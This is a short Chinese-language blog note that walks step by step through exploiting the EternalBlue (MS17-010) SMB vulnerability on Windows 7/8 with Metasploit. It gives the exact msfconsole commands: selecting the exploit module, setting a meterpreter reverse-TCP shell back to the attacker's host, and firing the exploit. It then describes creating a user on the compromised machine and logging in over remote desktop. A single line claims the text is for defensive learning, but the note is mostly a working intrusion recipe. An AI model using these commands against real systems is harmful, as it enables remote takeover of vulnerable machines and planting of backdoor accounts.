【笔记】攻击具有永恒之蓝漏洞的Windows
前言
永恒之蓝(英语:EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的档案分享协议的漏洞进行散播。维基百科
本文仅用于网络信息防御学习
准备工作
安装并配置好的 Metasploit Framework (传送门)
一台Windows7或Windows8的电脑
开始攻击
由于本文为测试,所以默认已知被攻击的电脑ip为”192.169.1.1”
启动 Metasploit Framework
1 | msfconsole |
- 查看微软17年编号为10的漏洞
1 | search ms17_010 |
- 利用永恒之蓝漏洞
1 | use exploit/windows/smb/ms17_010_eternalblue |
- 设置攻击手段为反弹shell(缺省值)
1 | set payload windows/x64/meterpreter/reverse_tcp |
- 设置目标ip
1 | set RHOST 目标IP地址 |
- 设置攻击者ip地址
1 | set LHOST 攻击者ip地址 |
- 开始攻击
1 | exploit |
- 如果攻击成功,即可获得控制权
完成
- 取得shell后,即可在目标电脑执行命令行操作
1 | meterpreter > help |
后记
创建用户
<username>
:用户名<password>
:密码
1 | meterpreter > shell |
通过创建的用户名和密码远程桌面
- 只能在有GUI的Kali下使用
rdesktop
命令
1 | rdesktop <ip>:3389 |